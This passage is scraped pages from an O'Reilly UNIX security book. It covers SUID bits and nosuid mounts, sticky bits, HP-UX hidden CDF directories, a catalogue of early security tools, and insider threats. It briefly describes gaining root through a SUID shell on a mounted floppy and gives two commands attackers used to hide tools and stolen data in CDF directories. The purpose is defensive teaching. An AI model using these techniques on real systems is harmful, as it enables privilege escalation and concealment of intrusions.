514 /dev/fd/2<br />

...<br />

533 /dev/fd/21<br />

534 /dev/fd/22<br />

535 /dev/fd/23<br />

3849 /sbin/su<br />

3850 /sbin/sulogin<br />

(The cat -ve command is present in the above to print control characters so that they will be noticed, and to indicate the end<br />

of line for filenames that end in spaces.)<br />

The ncheck command is very old, and has largely been superseded by other commands. It may not be present on all versions<br />

of <strong>UNIX</strong>, although it is present in SVR4. If you run it, you may discover that it is substantially faster than the find<br />

command, because ncheck reads the inodes directly, rather than searching through files in the filesystem. However, ncheck<br />

still needs to read some directory information to obtain pathnames, so it may not be that much faster.<br />

Unlike find, ncheck will locate SUID files that are hidden beneath directories that are used as mount-point. In this respect,<br />

ncheck is superior to find, because find can't find such files because they do not have complete pathnames as long as the<br />

mounts are mounted.<br />

You must be superuser to run ncheck.<br />

5.5.5 Turning Off SUID and SGID in Mounted Filesystems<br />

If you mount remote network filesystems on your computer, or if you allow users to mount their own floppy disks or<br />

CD-ROMS, you usually do not want programs that are SUID on these filesystems to be SUID on your computer as well. In<br />

a network environment, honoring SUID files means that if an attacker manages to take over the remote computer that houses<br />

the filesystem, he can also take over your computer, simply by creating a SUID program on the remote filesystem and<br />

running the program on your machine. Likewise, if you allow users to mount floppy disks containing SUID files on your<br />

computer, they can simply create a floppy disk with a SUID ksh on another computer, mount the floppy disk on your<br />

computer, and run the program - making themselves root.<br />

You can turn off the SUID and SGID bits on mounted filesystems by specifying the nosuid option with the mount<br />

command. You should always specify this option when you mount a foreign filesystem unless there is an overriding reason<br />

to import SUID or SGID files from the filesystem you are mounting. Likewise, if you write a program to mount floppy disks<br />

for a user, that program should specify the nosuid option (because the user can easily take his or her floppy disk to another<br />

computer and create a SUID file).<br />

For example, to mount the filesystem athena in the /usr/athena directory from the machine zeus with the nosuid option, type<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch05_05.htm (6 of 7) [2002-04-12 10:45:24]


[Chapter 5] 5.5 SUID<br />

the command:<br />

# /etc/mount -o nosuid zeus:/athena /usr/athena<br />

Some systems also support a -nodev option that causes the system to ignore device files that may be present on the mounted<br />

partition. If your system supports this option, you should use it, too. If your user creates a floppy with a mode 777 kmem, for<br />

instance, he can subvert the system with little difficulty if he is able to mount the floppy disk. This is because <strong>UNIX</strong> treats<br />

the /dev/kmem on the floppy disk the same way that it treats the /dev/kmem on your main system disk - it is a device that<br />

maps to your system's kernel memory.<br />

5.5.6 SGID and Sticky Bits on Directories<br />

Although the SGID and sticky bits were originally intended for use only with programs, Berkeley <strong>UNIX</strong>, SunOS, Solaris<br />

and other operating systems also use these bits to change the behavior of directories, as shown in Table 5.14.<br />

Table 5.14: Behavior of SGID and Sticky Bits with Directories<br />

Bit Effect<br />

SGID bit The SGID bit on a directory controls the way that groups are assigned for files created in the directory. If the<br />

SGID bit is set, files created in the directory have the same group as the directory if the process creating the file<br />

also is in that group. Otherwise, if the SGID bit is not set, or if the process is not in the same group, files created<br />

inside the directory have the same group as the user's effective group ID (usually the primary group ID).<br />

Sticky bit If the sticky bit is set on a directory, files inside the directory may be renamed or removed only by the owner of<br />

the file, the owner of the directory, or the superuser (even if the modes of the directory would otherwise allow<br />

such an operation); on some systems, any user who can write to a file can also delete it. This feature was added to<br />

keep an ordinary user from deleting another's files in the /tmp directory.<br />

For example, to set the mode of the /tmp directory on a system so any user can create or delete her own files but can't delete<br />

another's files, type the command:<br />

# chmod 1777 /tmp<br />

Many older versions of <strong>UNIX</strong> (System V prior to Release 4, for instance) do not exhibit either of these behaviors. On those<br />

systems, the SGID and sticky bits on directories are ignored by the system. However, on a few of these older systems<br />

(including SVR3), setting the SGID bit on the directory resulted in "sticky" behavior.<br />

5.5.7 SGID Bit on Files (System V <strong>UNIX</strong> Only): Mandatory Record Locking<br />

If the SGID bit is set on a nonexecutable file, AT&T System V <strong>UNIX</strong> implements mandatory record locking for the file.<br />

Normal <strong>UNIX</strong> record locking is discretionary; processes can modify a locked file simply by ignoring the record-lock status.<br />

On System V <strong>UNIX</strong>, the kernel blocks a process which tries to access a file (or the portion of the file) that is protected with<br />

mandatory record locking until the process that has locked the file unlocks it. Mandatory locking is enabled only if none of<br />

the execute permission bits are turned on.<br />

Mandatory record locking shows up in an ls listing in the SGID position as a capital "S" instead of a small "s":<br />

% ls -F data*<br />

-rw-rwS--- 1 fred 2048 Dec 3 1994 database<br />

-r-x--s--x 2 bin 16384 Apr 2 1993 datamaint*<br />

5.4 Using Directory<br />

Permissions<br />

5.6 Device Files<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch05_05.htm (7 of 7) [2002-04-12 10:45:24]


[Chapter 5] 5.9 Oddities and Dubious Ideas<br />

Chapter 5<br />

The <strong>UNIX</strong> Filesystem<br />

5.9 Oddities and Dubious Ideas<br />

In closing, we'll mention two rather unusual ideas in filesystems. This information is provided partially<br />

for completeness, in the event that one of our readers has such a system. The second reason is to<br />

document some ideas we don't think helped security very much. We hope we don't encounter anything<br />

like them again any time soon.<br />

5.9.1 Dual Universes<br />

Throughout this book, you will find that we often mention how the behavior of a command or action may<br />

be different if your version of <strong>UNIX</strong> is derived from BSD or AT&T <strong>UNIX</strong>. These differences are not so<br />

great as they once were, as SVR4 is the result of a merger of the majority of these two lines into one<br />

system.<br />

However, in years gone by, the two systems were separate. This presented an interesting puzzle for some<br />

vendors who wanted to cater to both markets. Thus, someone came up with the idea of universes. The<br />

idea itself was fairly simple. Create a per-process "switch" in memory that would be set to either BSD or<br />

AT&T. The behavior of various system calls might depend on the value of the switch. Furthermore,<br />

certain special directories could be set up so that the directory you'd actually see would depend on the<br />

switch setting. Thus, you could have /usr/bin full of user programs, but it would really be two /usr/bin<br />

directories - one of BSD and one of AT&T!<br />

Several companies adopted variations of the universe concept, including Pyramid, Apollo, Masccomp,<br />

and Sequent. In some of these systems, the switch from one environment to another was almost seamless,<br />

from the user's point of view. However, the scheme had several problems:<br />

●<br />

●<br />

●<br />

●<br />

It took more disk space for standard configuration. The standard system needed two copies of<br />

libraries, man pages, commands, and more.<br />

In most environments all the users stayed in a single universe. Shops were seldom heterogeneous<br />

in environment, so users preferred to stay with a familiar interface on everything they did.<br />

Patching and maintaining the programs took more than twice the effort because they required that<br />

users consider interactions between software in each universe.<br />

System administration was often a nightmare. You didn't necessarily know where all your<br />

commands were; you might need to worry about configuring two different UUCP systems; you<br />

couldn't always tell which version of a program was spawning jobs; and so on.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch05_09.htm (1 of 3) [2002-04-12 10:45:25]


[Chapter 5] 5.9 Oddities and Dubious Ideas<br />

Also important to all of this was the problem of security. Often, clever manipulation of interactions<br />

between programs in the two universes could be used to break security. Additionally, a bug discovered in<br />

one universe was often mirrored in the software of the other, but usually only one got fixed (at first).<br />

Eventually, everyone supporting a dual-universe system switched back to a single version of <strong>UNIX</strong>.<br />

Nevertheless, Solaris perpetuates some of these problems. For example, Solaris has two versions of the ls<br />

command, one in /usr/bin/ls, one in /usr/ucb/ls. It also has two versions of head, more, ln, ps, and many<br />

other commands. Thus, you need to check your search path carefully to know which version of a<br />

command you may be using.<br />

5.9.2 Context-Dependent Files<br />

To support diskless workstations, Hewlett-Packard developed a system called Context Dependent Files,<br />

or CDF. CDFS allow for multiple configurations to reside on a single computer. The goal of CDFS was<br />

to allow one master server to maintain multiple filesystems that will be viewed differently by different<br />

clients. This mechanism thus allows a single server to support a group of heterogeneous clients.<br />

A CDF is basically a hidden directory whose contents are matched against the current context. HP<br />

explains it as follows:[28]<br />

[28] From the HP man page for CDF.<br />

A CDF is implemented as a special kind of directory, marked by a bit in its mode (see<br />

chmod). The name of the CDF is the name of the directory; the contents of the directory are<br />

files with names that are expected to match one part of a process context. When such a<br />

directory is encountered during a pathname search, the names of the files in the directory are<br />

compared with each string in the process's context, in the order in which the strings appear<br />

in the context. The first match is taken to be the desired file. The name of the directory thus<br />

refers to one of the files within it, and the directory itself is normally invisible to the user.<br />

Hence, the directory is called a hidden directory.<br />

When a process with a context that does not match any filenames in the hidden directory<br />

attempts to access a file by the pathname of the hidden directory, the reference is<br />

unresolved; no file with that pathname appears to exist...<br />

A hidden directory itself can be accessed explicitly, overriding the normal selection<br />

according to context, by appending the character `+' to the directory's file name.<br />

Thus, HP-UX had directories that were invisible unless they contained a file that matched the running<br />

processes' current context.<br />

CDFS are a powerful abstraction, but they were sometimes exploited by attackers. For example, the<br />

following sequence of commands will create a CDF directory:<br />

% mkdir ./Hidden<br />

% chmod +H ./Hidden<br />

This resulted in a directory that was normally invisible unless the -H option was used with the ls or find<br />

commands. A clever attacker could store all kinds of tools, stolen data files, and other interesting bits in<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch05_09.htm (2 of 3) [2002-04-12 10:45:25]


[Chapter 5] 5.9 Oddities and Dubious Ideas<br />

such a directory. If the system administrator was not in the habit or was not trained to use the ls<br />

command with the -H option, then the directory might go unnoticed. The cracker could also find an<br />

existing CDF and store things in among the other files! As long as none of the filenames matched an<br />

existing context, they would probably never be noticed.<br />

Even worse, tools the system administrator obtained for checking the system's overall security might not<br />

be aware of the -H flag, and not invoke it.<br />

HP has dropped support for CDFS and moved to the use of NFS in version 10 of HP-UX, released in the<br />

spring of 1995. If you are not using version 10 or later, you should be sure to use the -H option on all ls<br />

and find commands!<br />

5.8 chgrp: Changing a File's<br />

Group<br />

5.10 Summary<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch05_09.htm (3 of 3) [2002-04-12 10:45:25]


[Appendix E] E.4 Software Resources<br />

Appendix E<br />

Electronic Resources<br />

E.4 Software Resources<br />

This appendix describes some of the tools and packages available on the <strong>Internet</strong> that you might find<br />

useful in maintaining security at your site. Many of these tools are mentioned in this book. Although this<br />

software is freely available, some of it is restricted in various ways by the authors (e.g., it may not be<br />

permitted to be used for commercial purposes or be included on a CD-ROM, etc.) or by the U.S.<br />

government (e.g., if it contains cryptography, it can"t ordinarily be exported outside the United States).<br />

Carefully read the documentation files that are distributed with the packages. If you have any doubt<br />

about appropriate use restrictions, contact the author(s) directly.<br />

Although we have used most of the software listed here, we can"t take responsibility for ensuring that the<br />

copy you get will work properly and won"t cause any damage to your system. As with any software, test<br />

it before you use it!<br />

COAST Software Archive<br />

The Computer Operations, Audit, and <strong>Sec</strong>urity Technology (COAST) project at Purdue University<br />

provides a valuable service to the <strong>Internet</strong> community by maintaining a current and well-organized<br />

repository of the most important security tools and documents on the <strong>Internet</strong>.<br />

The repository is available on host coast.cs.purdue.edu via anonymous FTP; start in the /pub/aux<br />

directory for listings of the documents and tools available. Many of the descriptions of tools in the list<br />

below are drawn from COAST"s tools.abstracts file, and we gratefully acknowledge their permission to<br />

use this information. To find out more about COAST, point a WWW viewer at their Web page:<br />

http://www.cs.purdue.edu/coast<br />

Note that the COAST FTP archive does not contain cryptographic software because of the export control<br />

issues involved. However, nearly everything else related to security is available in the archive. If you<br />

find something missing from the archive that you think should be present, contact the following email<br />

address: security-archive@cs.purdue.edu.<br />

NOTE: Some software distributions carry an external PGP signature (see Chapter 6,<br />

Cryptography). This signature helps you verify that the distribution you receive is the one<br />

packaged by the author. It does not provide any guarantee about the safety or correctness of<br />

the software, however.<br />

Because of the additional confidence that a digital signature can add to software distributed<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appe_04.htm (1 of 7) [2002-04-12 10:45:26]


[Appendix E] E.4 Software Resources<br />

over the <strong>Internet</strong>, we strongly encourage authors to take the additional step of including a<br />

stand-alone signature. We also encourage users who download software to check several<br />

other sources if they download a package without a signature.<br />

E.4.1 CERN HTTP Daemon<br />

CERN is the European Laboratory for Particle Physics, in Switzerland, and is "the birthplace of the<br />

World Wide Web." The CERN HTTP daemon is one of several common HTTP Servers on the <strong>Internet</strong>.<br />

What makes it particularly interesting is its proxying and caching capabilities, which make it especially<br />

well-suited to firewall applications.<br />

You can get the CERN HTTP daemon from:<br />

ftp://www.w3.org/pub/src/WWWDaemon.tar.Z<br />

E.4.2 chrootuid<br />

The chrootuid daemon, by Wietse Venema, makes the task of running a network service at a low<br />

privilege level and with restricted filesystem access easy. The program can be used to run Gopher,<br />

HTTP, WAIS, and other network daemons in a minimal environment: the daemons have access only to<br />

their own directory tree and run with an unprivileged user ID. This arrangement greatly reduces the<br />

impact of possible security problems in daemon software.<br />

You can get chrootuid from:<br />

ftp://ftp.win.tue.nl/pub/security/<br />

ftp://coast.cs.purdue.edu/pub/tools/unix/chrootuid<br />

E.4.3 COPS (Computer Oracle and Password System)<br />

The COPS package is a collection of short shell files and C programs that perform checks of your system<br />

to determine whether certain weaknesses are present. Included are checks for bad permissions on various<br />

files and directories, and malformed configuration files. The system has been designed to be simple and<br />

easy to verify by reading the code, and simple to modify for special local circumstances.<br />

The original COPS paper was presented at the summer 1990 USENIX Conference in Anaheim, CA. It<br />

was entitled "The COPS <strong>Sec</strong>urity Checker System," by Dan Farmer and Eugene H. Spafford.<br />

Copies of the paper can be obtained as a Purdue technical report by requesting a copy of technical report<br />

CSD-TR-993 from:<br />

Technical Reports<br />

Department of Computer Sciences<br />

Purdue University<br />

West Lafayette, IN 47907-1398<br />

COPS can be obtained from:<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appe_04.htm (2 of 7) [2002-04-12 10:45:26]


[Appendix E] E.4 Software Resources<br />

ftp://coast.cs.purdue.edu/pub/tools/unix/cops<br />

In addition, any of the public USENIX repositories for comp.sources.unix will have COPS in Volume<br />

22.<br />

E.4.4 ISS (<strong>Internet</strong> <strong>Sec</strong>urity Scanner)<br />

ISS, written by Christopher William Klaus, is the <strong>Internet</strong> <strong>Sec</strong>urity Scanner. When ISS is run from<br />

another system and directed at your system, it probes your system for software bugs and configuration<br />

errors commonly exploited by crackers. Like SATAN, it is a controversial tool; however, ISS is less<br />

controversial than SATAN in that it is older and less capable than SATAN, and it was written by<br />

someone who (at the time it was released) was relatively unknown in the network security community.<br />

Informal conversation with personnel at various response teams indicates that they find ISS involved in a<br />

significant number of intrusions - far more than they find associated with SATAN.<br />

You can get the freeware version of ISS from:<br />

ftp://coast.cs.purdue.edu/pub/tools/unix/iss/<br />

There is a commercial version of ISS that is not available on the net. It is supposed to have many more<br />

features than the freeware version. Neither of the authors has had any experience with the commercial<br />

version of ISS.<br />

E.4.5 Kerberos<br />

Kerberos is a secure network authentication system that is based upon private key cryptography. The<br />

Kerberos source code and papers are available from the Massachusetts Institute of Technology. Contact:<br />

MIT Software Center<br />

W32-300<br />

20 Carlton Street<br />

Cambridge, MA 02139<br />

(617) 253-7686<br />

You can use anonymous FTP to transfer files over the <strong>Internet</strong> from:<br />

ftp://athena-dist.mit.edu/pub/kerberos<br />

E.4.6 portmap<br />

The portmap daemon, written by Wietse Venema, is a replacement program for Sun Microsystem's<br />

portmapper program. Venema's portmap daemon offers access control and logging features that are not<br />

found in Sun's version of the program. It also comes with the source code, allowing you to inspect the<br />

code for problems or modify it with your own additional features, if necessary.<br />

You can get portmap from:<br />

ftp://win.tue.nl/pub/security/portmap-3.shar.Z<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appe_04.htm (3 of 7) [2002-04-12 10:45:26]


[Appendix E] E.4 Software Resources<br />

ftp://coast.cs.purdue.edu/pub/tools/unix/portmap.shar<br />

E.4.7 SATAN<br />

SATAN, by Wietse Venema and Dan Farmer, is the <strong>Sec</strong>urity Administrator Tool for Analyzing<br />

Networks.[1] Despite the authors' strong credentials in the network security community (Venema is from<br />

Eindhoven University in the Netherlands and is the author of the tcpwrapper package and several other<br />

network security tools; Farmer is the author of COPS), SATAN was a somewhat controversial tool when<br />

it was released. Why? Unlike COPS, Tiger, and other tools that work from within a system, SATAN<br />

probes the system from the outside, as an attacker would. The unfortunate consequence of this approach<br />

is that someone (such as an attacker) can run SATAN against any system, not only those that he already<br />

has access to. According to the authors:<br />

[1] If you don"t like the name SATAN, it comes with a script named repent that changes all<br />

references from SATAN to SANTA: <strong>Sec</strong>urity Administrator Network Tool for Analysis.<br />

SATAN was written because we realized that computer systems are becoming more and<br />

more dependent on the network, and at the same time becoming more and more vulnerable<br />

to attack via that same network.<br />

SATAN is a tool to help systems administrators. It recognizes several common<br />

networking-related security problems, and reports the problems without actually exploiting<br />

them.<br />

For each type or problem found, SATAN offers a tutorial that explains the problem and<br />

what its impact could be. The tutorial also explains what can be done about the problem:<br />

correct an error in a configuration file, install a bugfix from the vendor, use other means to<br />

restrict access, or simply disable service.<br />

SATAN collects information that is available to everyone on with access to the network.<br />

With a properly-configured firewall in place, that should be near-zero information for<br />

outsiders.<br />

The controversy over SATAN's release was largely overblown. SATAN scans are usually easy to spot,<br />

and the package is not easy to install and run. Most response teams seem to have more trouble with<br />

people running ISS scans against their networks.<br />

From a design point of view, SATAN is interesting in that the program uses a Web browser as its<br />

presentation system. The source may be obtained from:<br />

ftp://ftp.win.tue.nl/pub/security/satan.tar.Z<br />

Source, documentation, and pointers to defenses may be found at:<br />

http://www.cs.purdue.edu/coast/satan.html<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appe_04.htm (4 of 7) [2002-04-12 10:45:26]


[Appendix E] E.4 Software Resources<br />

E.4.8 SOCKS<br />

SOCKS, originally written by David Koblas and Michelle Koblas and now maintained by Ying-Da Lee,<br />

is a proxy-building toolkit that allows you to convert standard TCP client programs to proxied versions<br />

of those same programs. There are two parts to SOCKS: client libraries and a generic server. Client<br />

libraries are available for most <strong>UNIX</strong> platforms, as well as for Macintosh and Windows systems. The<br />

generic server runs on most <strong>UNIX</strong> platforms and can be used by any of the client libraries, regardless of<br />

the platform.<br />

You can get SOCKS from:<br />

ftp://ftp.nec.com/pub/security/socks.cstc/<br />

ftp://coast.cs.purdue.edu/pub/tools/unix/socks/<br />

E.4.9 Swatch<br />

Swatch, by Todd Atkins of Stanford University, is the Simple Watcher. It monitors log files created by<br />

syslog, and allows an administrator to take specific actions (such as sending an email warning, paging<br />

someone, etc.) in response to logged events and patterns of events.<br />

You can get Swatch from:<br />

ftp://stanford.edu/general/security-tools/swatch<br />

ftp://coast.cs.purdue.edu/pub/tools/unix/swatch/<br />

E.4.10 tcpwrapper<br />

The tcpwrapper is a system written by Wietse Venema that allows you to monitor and filter incoming<br />

requests for servers started by inetd. You can use it to selectively deny access to your sites from other<br />

hosts on the <strong>Internet</strong>, or, alternatively, to selectively allow access.<br />

You can get tcpwrapper from:<br />

ftp://ftp.win.tue.nl/pub/security/<br />

ftp://coast.cs.purdue.edu/pub/tools/unix/tcp_wrappers/<br />

E.4.11 Tiger<br />

Tiger, written by Doug Schales of Texas A&M University (TAMU), is a set of scripts that scans a <strong>UNIX</strong><br />

system looking for security problems, in a manner similar to that of Dan Farmer"s COPS. Tiger was<br />

originally developed to provide a check of the <strong>UNIX</strong> systems on the A&M campus that users wanted to<br />

be able to access off-campus. Before the packet filtering in the firewall would be modified to allow<br />

off-campus access to the system, the system had to pass the Tiger checks.<br />

You can get Tiger from:<br />

ftp://net.tamu.edu/pub/security/TAMU/<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appe_04.htm (5 of 7) [2002-04-12 10:45:26]


[Appendix E] E.4 Software Resources<br />

ftp://coast.cs.purdue.edu/pub/tools/unix/tiger<br />

E.4.12 TIS <strong>Internet</strong> Firewall Toolkit<br />

The TIS <strong>Internet</strong> Firewall Toolkit (FWTK), from Trusted Information Systems, Inc., is a useful, well<br />

designed, and well written set of programs for controlling access to <strong>Internet</strong> servers from the <strong>Internet</strong>.<br />

FWTK includes:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Authentication server that provides several mechanisms for supporting nonreusable passwords<br />

Access control program (wrapper for inetd-started services), netac<br />

Proxy servers for a variety of protocols (FTP, HTTP, Gopher, rlogin, Telnet, and X11)<br />

Generic proxy server for simple TCP-based protocols using one-to-one or many-to-one<br />

connections, such as NNTP<br />

Wrapper (the smap package) for SMTP servers such as Sendmail to protect them from<br />

SMTP-based attacks.<br />

The toolkit is designed so that you can pick and choose only the pieces you need; you don"t have to<br />

install the whole thing. The pieces you do install share a common configuration file, however, which<br />

makes managing configuration changes somewhat easier.<br />

Some parts of the toolkit (the server for the nonreusable password system, for example) require a Data<br />

Encryption Standard (DES) library in some configurations. If your system doesn't have the library (look<br />

for a file named libdes.a in any of your system directories in which code libraries are kept), you can get<br />

one from:<br />

ftp://ftp.psy.uq.oz.au/pub/DES/.<br />

TIS maintains a mailing list for discussions of improvements, bugs, fixes, and so on among people using<br />

the toolkit; Send email to fwall-users-request@tis.com to subscribe to this list.<br />

You can get the toolkit from:<br />

ftp://ftp.tis.com/pub/firewalls/toolkit/<br />

E.4.13 trimlog<br />

David Curry's trimlog is designed to help you to manage log files. It reads a configuration file to<br />

determine which files to trim, how to trim them, how much they should be trimmed, and so on. The<br />

program helps keep your logs from growing until they consume all available disk space.<br />

You can get trimlog from:<br />

ftp://coast.cs.purdue.edu/pub/tools/unix/trimlog<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appe_04.htm (6 of 7) [2002-04-12 10:45:26]


[Appendix E] E.4 Software Resources<br />

E.4.14 Tripwire<br />

Tripwire, written by Gene H. Kim and Gene Spafford of the COAST project at Purdue University, is a<br />

file integrity checker, a utility that compares a designated set of files and directories against information<br />

stored in a previously generated database. Added or deleted files are flagged and reported, as are any<br />

files that have changed from their previously recorded state in the database. Run Tripwire against system<br />

files on a regular basis. If you do so, the program will spot any file changes when it next runs, giving<br />

system administrators information to enact damage-control measures immediately.<br />

You can get Tripwire from:<br />

ftp://coast.cs.purdue.edu/pub/COAST/Tripwire<br />

Several technical reports on Tripwire design and operation are also present in the distribution as<br />

PostScript files.<br />

E.4.15 UDP Packet Relayer<br />

The UDP Packet Relayer, written by Tom Fitzgerald, is a proxy system that provides much the same<br />

functionality for UDP-based clients that SOCKS provides for TCP-based clients.<br />

You can get this proxy system from:<br />

ftp://coast.cs.purdue.edu/pub/tools/unix/udprelay-0.2.tar.gz<br />

E.4.16 wuarchive ftpd<br />

The wuarchive FTP daemon offers many features and security enhancements, such as per-directory<br />

message files shown to any user who enters the directory, limits on number of simultaneous users, and<br />

improved logging and access control. These enhancements are specifically designed to support<br />

anonymous FTP.<br />

You can get the daemon from:<br />

ftp://ftp.wustl.edu/packages/wuarchive-ftpd/<br />

ftp://ftp.uu.net/networking/archival/ftp/wuarchive-ftpd/<br />

An updated version of the server, with enhancements by several people, is available from:<br />

ftp://ftp.academ.com/pub/wu-ftpd/private/<br />

E.3 WWW Pages F. Organizations<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appe_04.htm (7 of 7) [2002-04-12 10:45:26]


[Chapter 27] 27.3 Can You Trust People?<br />

Chapter 27<br />

Who Do You Trust?<br />

27.3 Can You Trust People?<br />

Ultimately, people hack into computers. People delete files and alter system programs. People steal<br />

information. You should determine who you trust (and who you don't trust).<br />

27.3.1 Your Employees?<br />

Much of this book has been devoted to techniques that protect computer systems from attacks by<br />

outsiders. This focus isn't only our preoccupation: overwhelmingly, companies fear attacks from<br />

outsiders more than they fear attacks from the inside. Unfortunately, such fears are misplaced. Statistics<br />

compiled by the FBI and others show that the majority of major economic losses from computer crime<br />

appear to involve people on the "inside."<br />

Companies seem to fear attacks from outsiders more than insiders because they fear the unknown. Few<br />

managers want to believe that their employees would betray their bosses, or the company as a whole.<br />

Few businesses want to believe that their executives would sell themselves out to the competition. As a<br />

result, many organizations spend vast sums protecting themselves from external threats, but do little in<br />

the way of instituting controls and auditing to catch and prevent problems from the inside.<br />

Not protecting your organization against its own employees is a short-sighted policy. Protecting against<br />

insiders automatically buys an organization protection from outsiders as well. After all, what do outside<br />

attackers want most of all? They want an account on your computer, an account from which they can<br />

unobtrusively investigate your system and probe for vulnerabilities. Employes, executives, and other<br />

insiders already have this kind of access to your computers. And, according to recent computer industry<br />

surveys, attacks from outsiders and from rogue software account for only a small percentage of overall<br />

corporate losses; as many as 80% of attacks come from employees and former employees who are<br />

dishonest or disgruntled.<br />

No person in your organization should be placed in a position of absolute trust. Unfortunately, many<br />

organizations implicitly trust the person who runs the firm's computer systems. Increasingly, outside<br />

auditors are now taking a careful look at the policies and procedures in Information Systems support<br />

organizations - making certain that backups are being performed, that employees are accountable for<br />

their actions, and that everybody operates within a framework of checks and balances.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch27_03.htm (1 of 4) [2002-04-12 10:45:26]


[Chapter 27] 27.3 Can You Trust People?<br />

27.3.2 Your System Administrator?<br />

The threat of a dishonest system administrator should be obvious enough. After all, who knows better<br />

where all the goodies are kept, and where all the alarms are set? However, before you say that you trust<br />

your support staff, ask yourself a question: they may be honest, but are they competent?<br />

We know of a recent case in which a departmental server was thoroughly compromised by at least two<br />

different groups of hackers. The system administrator had no idea what had happened, probably because<br />

he wasn't very adept at <strong>UNIX</strong> system administration. How were the intruders eventually discovered?<br />

During a software audit, the system was revealed to be running software that was inconsistent with what<br />

should have been there. What should have been there was an old, unpatched version of the software.[5]<br />

Investigation revealed that hackers had apparently installed new versions of system commands to keep<br />

their environment up to date because the legitimate administrator wasn't doing the job.<br />

[5] Actually, the very latest software should have been there. However, the system<br />

administrator hadn't done any updates in more than two years, so we expected the old<br />

software to be in place.<br />

Essentially, the hackers were doing a better job of maintaining the machine than the hired staff was. The<br />

hackers were then using the machine to stage attacks against other computers on the <strong>Internet</strong>.<br />

In such cases, you probably have more to fear from incompetent staff than from some outsiders. After all,<br />

if the staff bungles the backups, reformats the disk drives, and then accidentally erases over the only<br />

good copies of data you have left, the data is as effectively destroyed as if a professional saboteur had<br />

hacked into the system and deleted it.<br />

27.3.3 Your Vendor?<br />

We heard about one case in which a field service technician for a major computer company was busy<br />

casing sites for later burglaries. He was shown into the building, was given unsupervised access to the<br />

equipment rooms, and was able to obtain alarm codes and door-lock combinations over time. When the<br />

thefts occurred, police were sure the crime was an inside job, but no one immediately realized how<br />

"inside" the technician had become.<br />

There are cases in which U.S. military and diplomatic personnel at overseas postings had computer<br />

problems and took their machines in to local service centers. When they got home, technicians<br />

discovered a wide variety of interesting - and unauthorized - additions to the circuitry.<br />

What about the software you get from the vendor? For instance, AT&T claims that Ken Thompson's<br />

compiler modifications (described earlier under "Trusting Trust") were never in any code that was<br />

shipped to customers. How do we know for sure? What's really in the code on your machines?<br />

27.3.4 Your Consultants?<br />

There are currently several people in the field of computer security consulting whose past is not quite<br />

sterling. These are people who have led major hacking rings, who brag about breaking into corporate and<br />

government computers, and who may have been indicted and prosecuted for computer crimes. Some of<br />

them have even done time in jail. Now they do security consulting - and a few even use their past in<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch27_03.htm (2 of 4) [2002-04-12 10:45:26]


[Chapter 27] 27.3 Can You Trust People?<br />

advertising (although most do not).<br />

How trustworthy are these people? Who better to break into your computer system later on than the<br />

person who helped design the defenses? Think about this issue from a liability standpoint - would you<br />

hire a confessed arsonist to install your fire alarm system, or a convicted pedophile to run your company<br />

day-care center? He'd certainly know what to protect the children against! What would your insurance<br />

company have to say about that? Your stockholders?<br />

Some security consultants are more than simply criminals; they are compulsive system hackers. Why<br />

should you believe that they are more trustworthy and have more self control now than they did a few<br />

years ago?<br />

If you are careful not to hire suspicious individuals, how about your service provider? Your maintenance<br />

organization? Your software vendor? The company hired to clean your offices at night? The temp service<br />

that provides you with replacements for your secretary when your secretary goes on leave? Potential<br />

computer criminals, and those with an unsavory past, are as capable of putting on street clothes and<br />

holding down a regular job as anyone else. They don't have a scarlet "H" tattooed on their foreheads.<br />

Can you trust references for your hires or consultants? Consider the story, possibly apocryphal, of the<br />

consultant at the large bank who found a way to crack security and steal $5 million. He was caught by<br />

bank security personnel later, but they couldn't trace the money or discover how he did it. So he struck a<br />

deal with the bank: he'd return all but 10% of the money, forever remain silent about the theft, and reveal<br />

the flaw he exploited in return for no prosecution and a favorable letter of reference. The bank eagerly<br />

agreed, and wrote the loss off as an advertising and training expense. Of course, with the favorable letter,<br />

he quickly got a job at the next bank running the same software. After only a few such job changes, he<br />

was able to retire with a hefty savings account in Switzerland.<br />

Bankers Mistrust<br />

Banks and financial institutions have notorious reputations for not reporting computer crimes. We have<br />

heard of cases in which bank personnel have traced active hacking attempts to a specific person, or<br />

developed evidence showing that someone had penetrated their systems, but they did not report these<br />

cases to the police for fear of the resulting publicity.<br />

In other cases, we've heard that bank personnel have paid people off to get them to stop their attacks and<br />

keep quiet. Some experts in the industry contend that major banks and trading houses are willing to<br />

tolerate a few million dollars in losses per week rather than suffer the perceived bad publicity about a<br />

computer theft. To them, a few million a week is less than the interest they make on investments over a<br />

few hours: it's below the noise threshold.<br />

Are these stories true? We don't know, but we haven't seen too many cases of banks reporting computer<br />

crimes, and we somehow don't think they are immune to attack. If anything, they're bigger targets.<br />

However, we do know that bankers tend to be conservative, and they worry that publicity about computer<br />

problems is bad for business.<br />

Odd, if true. Think about the fact that when some kid with a gun steals $1000 from the tellers at a branch<br />

